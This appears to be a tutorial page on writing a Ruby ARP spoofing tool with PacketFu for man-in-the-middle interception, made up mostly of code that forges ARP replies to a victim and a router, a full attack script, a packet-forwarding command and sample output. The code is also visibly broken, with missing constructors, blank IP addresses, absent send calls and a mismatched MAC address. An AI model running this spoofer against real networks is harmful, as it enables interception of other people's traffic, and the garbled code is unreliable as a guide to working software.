ARP Spoofing

As you know, ARP Spoofing attack in the core of MitM attacks. In this part we'll know how to write simple and effective ARP spoofer tool to use it in later spoofing attacks.


We have 3 machines in this scenario as shown below.

|Victim| -----------------> |Router| ---> Internet

Here the list of IP and MAC addresses of each of theme in the following table

To know our/attacker's interface information

info = PacketFu::Utils.whoami?(:iface => "wlan0")

returns a hash

 :eth_dst=>"\x00P\x7F\xE6\x96 ",

So you can extract these information like any hash info[:iface], info[:ip_saddr], info[:eth_saddr], etc..

Building victim's ARP packet

# Build Ethernet header
arp_packet_victim =
arp_packet_victim.eth_saddr = "3C:77:E6:68:66:E9"       # our MAC address
arp_packet_victim.eth_daddr = "00:0C:29:38:1D:61"       # the victim's MAC address
# Build ARP Packet
arp_packet_victim.arp_saddr_mac = "3C:77:E6:68:66:E9"   # our MAC address
arp_packet_victim.arp_daddr_mac = "00:0C:29:38:1D:61"   # the victim's MAC address
arp_packet_victim.arp_saddr_ip = ""          # the router's IP
arp_packet_victim.arp_daddr_ip = ""         # the victim's IP
arp_packet_victim.arp_opcode = 2                        # arp code 2 == ARP reply

Building router packet

# Build Ethernet header
arp_packet_router =
arp_packet_router.eth_saddr = "3C:77:E6:68:66:E9"       # our MAC address
arp_packet_router.eth_daddr = "00:0C:29:38:1D:61"       # the router's MAC address
# Build ARP Packet
arp_packet_router.arp_saddr_mac = "3C:77:E6:68:66:E9"   # our MAC address
arp_packet_router.arp_daddr_mac = "00:50:7F:E6:96:20"   # the router's MAC address
arp_packet_router.arp_saddr_ip = ""         # the victim's IP
arp_packet_router.arp_daddr_ip = ""          # the router's IP
arp_packet_router.arp_opcode = 2                        # arp code 2 == ARP reply

Run ARP Spoofing attack

# Send our packet through the wire
while true
    sleep 1
    puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
    puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"


Wrapping all together and run as root

#!/usr/bin/env ruby
# ARP Spoof Basic script
require 'packetfu'

attacker_mac = "3C:77:E6:68:66:E9"
victim_ip    = ""
victim_mac   = "00:0C:29:38:1D:61"
router_ip    = ""
router_mac   = "00:50:7F:E6:96:20"

info = PacketFu::Utils.whoami?(:iface => "wlan0")
# Victim
# Build Ethernet header
arp_packet_victim =
arp_packet_victim.eth_saddr = attacker_mac        # attacker MAC address
arp_packet_victim.eth_daddr = victim_mac          # the victim's MAC address
# Build ARP Packet
arp_packet_victim.arp_saddr_mac = attacker_mac    # attacker MAC address
arp_packet_victim.arp_daddr_mac = victim_mac      # the victim's MAC address
arp_packet_victim.arp_saddr_ip = router_ip        # the router's IP
arp_packet_victim.arp_daddr_ip = victim_ip        # the victim's IP
arp_packet_victim.arp_opcode = 2                  # arp code 2 == ARP reply

# Router
# Build Ethernet header
arp_packet_router =
arp_packet_router.eth_saddr = attacker_mac        # attacker MAC address
arp_packet_router.eth_daddr = router_mac          # the router's MAC address
# Build ARP Packet
arp_packet_router.arp_saddr_mac = attacker_mac    # attacker MAC address
arp_packet_router.arp_daddr_mac = router_mac      # the router's MAC address
arp_packet_router.arp_saddr_ip = victim_ip        # the victim's IP
arp_packet_router.arp_daddr_ip = router_ip        # the router's IP
arp_packet_router.arp_opcode = 2                  # arp code 2 == ARP reply

while true
    sleep 1
    puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
    puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"

Note: Don't forget to enable packet forwarding on your system to allow victim to browse internet.

echo "1" > /proc/sys/net/ipv4/ip_forward

Returns, time to wiresharking ;)

[+] Sending ARP packet to victim:
[+] Sending ARP packet to router:
[+] Sending ARP packet to victim:
[+] Sending ARP packet to router:
[+] Sending ARP packet to victim:
[+] Sending ARP packet to router:

Last updated